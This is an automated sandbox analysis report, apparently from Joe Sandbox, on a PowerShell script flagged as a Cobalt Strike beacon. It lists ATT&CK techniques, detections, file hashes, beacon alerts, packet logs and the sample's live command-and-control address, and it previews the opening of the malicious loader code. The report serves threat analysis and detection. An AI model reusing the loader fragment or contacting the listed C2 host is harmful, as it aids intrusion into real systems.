                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C6670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_0000022EFA0C6670
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0CEE8C socket,closesocket,htons,bind,listen,0_2_0000022EFA0CEE8C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0E2630 bind,0_2_0000022EFA0E2630
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_0000022EFA0C6A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_0000022EFA0C6A78

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure2
                      Valid Accounts                      		1
                      Native API                      		2
                      Valid Accounts                      		2
                      Valid Accounts                      		1
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		21
                      Access Token Manipulation                      		2
                      Valid Accounts                      		LSASS Memory141
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Non-Standard Port                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                      Process Injection                      		21
                      Virtualization/Sandbox Evasion                      		Security Account Manager21
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive2
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		21
                      Access Token Manipulation                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput Capture1
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Process Injection                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeylogging111
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Obfuscated Files or Information                      		Cached Domain Credentials1
                      Account Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Software Packing                      		DCSync1
                      System Owner/User Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading                      		Proc Filesystem2
                      File and Directory Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow13
                      System Information Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3.ps174%ReversingLabsScript-PowerShell.Trojan.CobaltStrike
                      3.ps1100%AviraTR/Coblat.G1

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://3.78.244.11:8080/dot.gif11:8080/dot.gif0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gif~0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifll0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifU0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifllV0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifPDL0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifG0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifD0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gif0%Avira URL Cloudsafe
                      3.78.244.110%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gife0%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gif9.00%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gifystem320%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gif20%Avira URL Cloudsafe
                      http://3.78.244.11:8080/dot.gif10%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      3.78.244.11true
                      • Avira URL Cloud: safe
                      		unknown
                      http://3.78.244.11:8080/dot.giftrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://3.78.244.11:8080/dot.gifGpowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.4098790194.0000022EE2E6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://3.78.244.11:8080/dot.gif~powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://go.micropowershell.exe, 00000000.00000002.4098790194.0000022EE2508000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://3.78.244.11:8080/dot.gif11:8080/dot.gifpowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://3.78.244.11:8080/dot.gifDpowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://3.78.244.11:8080/dot.gifllVpowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://3.78.244.11:8080/dot.gifPDLpowershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://3.78.244.11:8080/dot.gifllpowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.4098790194.0000022EE1B08000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://3.78.244.11:8080/dot.gifUpowershell.exe, 00000000.00000002.4121724697.0000022EF9D85000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/powershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://3.78.244.11:8080/dot.gifepowershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://3.78.244.11:8080/dot.gifystem32powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://3.78.244.11:8080/dot.gif9.0powershell.exe, 00000000.00000002.4119501587.0000022EF99F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://127.0.0.1:%u/powershell.exe, 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.4098790194.0000022EE18E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://3.78.244.11:8080/dot.gif1powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crl.vpowershell.exe, 00000000.00000002.4119501587.0000022EF9A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://3.78.244.11:8080/dot.gif2powershell.exe, 00000000.00000002.4119501587.0000022EF9A86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                3.78.244.11
                                                		unknownUnited States
                                                		16509AMAZON-02UStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1562630
                                                Start date and time:2024-11-25 19:57:08 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 6m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:6
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:3.ps1
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winPS1@2/5@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 7
                                                • Number of non-executed functions: 151
                                                Cookbook Comments:
                                                • Found application associated with file extension: .ps1
                                                • Override analysis time to 240s for powershell

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • VT rate limit hit for: 3.ps1

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                13:57:59API Interceptor52x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                AMAZON-02UShttps://myworkspaceb7705.myclickfunnels.com/ville-de-rouyn-norandaGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                • 13.35.58.62
                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                • 18.238.49.74
                                                https://clickme.thryv.com/ls/click?upn=u001.dxrPihnXBHUGsddmpkmwUOT9H2uuoftUJgS1ImyDp5PjZ7uor3Bx5LY8846lufrxOd-2B-2FCl5NSKC1v9uXskdIrA-3D-3DPV4X_Uxfyb-2FV90WCSGuHCd77YDe2QH-2FfxD2e5Op8ULStuWwSYUM08QLuqWk0rbdQO8p2GP5XR1Nwn9dFZi5DaOMyz92mdTvaHywQzrJIxcHTOEjrrUNll1a6cdLHKylkZo7LdScnRC-2F7iC6hnMEdduqsWXASxbd-2BZeaoWZvCDaIudlukgt9S3uZsKQeBP86XSjGCyt8CMjRvxL6j1Dyr0eym46qao7knFO6iIo9LZAeoxbyu5E6pzhyc9-2F2VP-2BlZM3Ea-2B-2FiBNpyPNxcoMEQ2om5Ig-2F7RZ8WTAt-2F5MxtsslPlJve5tzpsISP74pi-2B8USUpl-2BAaEmzHGUoeKWRMyxJH35FiSw-3D-3DGet hashmaliciousUnknownBrowse
                                                • 3.160.188.112
                                                W9UAjNR4L6.exeGet hashmaliciousNjratBrowse
                                                • 18.197.239.5
                                                AccountDocuments - christinal.docxGet hashmaliciousUnknownBrowse
                                                • 13.227.8.48
                                                https://protection.cloze.email/r/EKJc7NAc1aGPd0140vt6MnJzYkpI4pQCyldpUEBtdFT8T8dhNmmHodcXxvKddJW4AhfqaDIQj32BX0HxSGbmPeDqDQs/n/SlBNQ05FV1NMRVRURVI/y52l9ppb.r.ap-northeast-1.awstrack.me/L0/https:%2F%2Fcloudprotectionc5f91e84a2b3d9e748f2a1d9b7e5f0c4a2b3d9e7a5pages.dynamixs.workers.dev%2F/1/010601933048cf65-492c630f-d6b3-471e-a31f-bf186231f1e8-000000/SL9CcqykWh2mQIC7eGiOMwzMSpk=185Get hashmaliciousUnknownBrowse
                                                • 35.79.77.164
                                                https://eastmancuts.jimdosite.com/Get hashmaliciousUnknownBrowse
                                                • 54.171.97.194
                                                https://www.google.com/url?q=https://clickme.thryv.com/ls/click?upn%3Du001.3HlspJ5fg-2BP4CQkV7GSVhvWTpgC6w0k7sA8b2Z9JBYU9BEMXtqHWLHW9PPcpforJszQ3_jzclrAiO28PBUU1ZLf2yC1YJEF5Rt8zDnz4yKbEuFqXf3c0fVOhzL2fXxOYix3CjCrzlLwoIPSXb9PavK50mtpdK-2FWF7thydb3q6E5ptEQiOVUz527Ewi1t813S-2FHejAJLe09fD2VqgM8mtwuQZA9i83VLkCPF4iItCSPXKUpNgWQKWxjEO6jlBp5GYVLghrpKcDuea5GONmLMVlbh4fQe7dtjhTFxxxExxfN1kv5tnx1PPl9DjYIyE468wz1qa1Z-2FWJgZrJbIFEpqhd4o5tGGyUoiPcIot5l2j9dpjy7QKj99ZiCz-2BBLi5dHUIl8gC4RxZBl-2FMaH4IZlQyWpqM-2BtZ9uE3ezFUl2fORMwAp4lQk-3D%23Cjanetrosenbach@imageindustries.com&source=gmail-imap&ust=1733149343000000&usg=AOvVaw1uIAp-JnZbTlkY9Td9ZLJjGet hashmaliciousHTMLPhisherBrowse
                                                • 3.160.188.6
                                                file.exeGet hashmaliciousStealc, VidarBrowse
                                                • 3.160.188.18
                                                Annual_Q4_Benefits_&_Bonus_for_Ed.riley#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousHTMLPhisherBrowse
                                                • 18.158.211.73

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):9434
                                                Entropy (8bit):4.928515784730612
                                                Encrypted:false
                                                SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                MD5:D3594118838EF8580975DDA877E44DEB
                                                SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5noeq2o4.gsw.ps1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngfgu5wb.msr.psm1

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6221
                                                Entropy (8bit):3.7293891251548903
                                                Encrypted:false
                                                SSDEEP:48:t/QToHLPr3C4U28zLjgukvhkvklCywCmdk6nQiWl15SogZoJ6YE6nQiWl15SogZS:NPH33CxHH1kvhkvCCtfQiW4HsQiW4HS
                                                MD5:CB9A2F88C67847A9BB3EE74E9ACAF104
                                                SHA1:B30D79DC6C4C976A5569BAC01E6C34E6DA00F593
                                                SHA-256:2E80405AD6A171DABB4950964D748FD776863B5AAA87D30E211E44E6D6F3E166
                                                SHA-512:7CB9AAB4B795079FCA63DB53527422CEE7E121F468F30D3BFD1CC483125F3658CC076B3B0048FA88AEFFE374DDE8CD374A3D1839CAAE615D6D638124E4229139
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...-/.v....L.}.k?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....`...k?...k..k?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY;............................%..A.p.p.D.a.t.a...B.V.1.....yY:...Roaming.@......CW.^yY:...........................#...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY=.....Q...........

                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WMNT3I4XNG9Y59JGGE9M.temp

                                                Download File
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):6221
                                                Entropy (8bit):3.7293891251548903
                                                Encrypted:false
                                                SSDEEP:48:t/QToHLPr3C4U28zLjgukvhkvklCywCmdk6nQiWl15SogZoJ6YE6nQiWl15SogZS:NPH33CxHH1kvhkvCCtfQiW4HsQiW4HS
                                                MD5:CB9A2F88C67847A9BB3EE74E9ACAF104
                                                SHA1:B30D79DC6C4C976A5569BAC01E6C34E6DA00F593
                                                SHA-256:2E80405AD6A171DABB4950964D748FD776863B5AAA87D30E211E44E6D6F3E166
                                                SHA-512:7CB9AAB4B795079FCA63DB53527422CEE7E121F468F30D3BFD1CC483125F3658CC076B3B0048FA88AEFFE374DDE8CD374A3D1839CAAE615D6D638124E4229139
                                                Malicious:false
                                                Preview:...................................FL..................F.".. ...-/.v....L.}.k?..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....`...k?...k..k?......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^yY;............................%..A.p.p.D.a.t.a...B.V.1.....yY:...Roaming.@......CW.^yY:...........................#...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^yY=.....Q...........

                                                Static File Info

                                                General

                                                File type:ASCII text, with very long lines (12594), with CRLF line terminators
                                                Entropy (8bit):5.738857250711805
                                                TrID:
                                                  File name:3.ps1
                                                  File size:412'061 bytes
                                                  MD5:69c80576e5413dc4d0d60de98439f649
                                                  SHA1:2fe44c3f073e661eb0cd6dd2c5890b067743ea5d
                                                  SHA256:85856010d3e63101c30a3d061dd55c758350030dd9b14794044a479860abb37f
                                                  SHA512:87db764a6217f3a2c6b999122b440cf8dfd5cdbb08ec13147cc2cf1549c18fc0c0afb52d5003313fe1c0d97fb3f7d4ca51062a8e8a37eab564c65c3abcfd211f
                                                  SSDEEP:6144:tgCjcsHxN7zWkV4mne5klEz1/rxiAsmwAJhcEstTHo84ZbxGdnuFmlgC5fe5QLPO:tgC4sRNvW5Oe+cVroAsEJCE38QKOq7bu
                                                  TLSH:C8947C473F59A9ADD612F122EA2EB0C235E4B52F94A58AC4B7F1D4F518F802134F43A7
                                                  File Content Preview:Set-StrictMode -Version 2....function func_get_proc_address {...Param ($var_module, $var_procedure).....$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equal

                                                  File Icon

                                                  Icon Hash:3270d6baae77db44

                                                  Network Behavior

                                                  Suricata IDS Alerts

                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-25T19:57:52.370990+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4500133.78.244.118080TCP
                                                  2024-11-25T19:58:04.324931+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497303.78.244.118080TCP
                                                  2024-11-25T19:58:26.502407+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497313.78.244.118080TCP
                                                  2024-11-25T19:58:48.674634+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497383.78.244.118080TCP
                                                  2024-11-25T19:59:10.821761+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497393.78.244.118080TCP
                                                  2024-11-25T19:59:33.097220+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497673.78.244.118080TCP
                                                  2024-11-25T19:59:55.285301+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498163.78.244.118080TCP
                                                  2024-11-25T20:00:17.416993+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498643.78.244.118080TCP
                                                  2024-11-25T20:00:39.636064+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499153.78.244.118080TCP
                                                  2024-11-25T20:01:01.824176+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4499633.78.244.118080TCP
                                                  2024-11-25T20:01:23.980870+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4500113.78.244.118080TCP
                                                  2024-11-25T20:01:46.137579+01002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4500123.78.244.118080TCP

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 25, 2024 19:58:00.195401907 CET497308080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:00.315545082 CET8080497303.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:00.315635920 CET497308080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:00.315752983 CET497308080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:00.436393023 CET8080497303.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:04.324930906 CET497308080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:04.434247971 CET497318080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:04.554316044 CET8080497313.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:04.554414034 CET497318080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:04.554482937 CET497318080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:04.675780058 CET8080497313.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:26.502276897 CET8080497313.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:26.502407074 CET497318080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:26.502475023 CET497318080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:26.605968952 CET497388080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:26.622425079 CET8080497313.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:26.726027966 CET8080497383.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:26.726234913 CET497388080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:26.726310968 CET497388080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:26.847184896 CET8080497383.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:48.674527884 CET8080497383.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:48.674633980 CET497388080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:48.674725056 CET497388080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:48.778868914 CET497398080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:58:48.795824051 CET8080497383.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:58:48.901276112 CET8080497393.78.244.11192.168.2.4
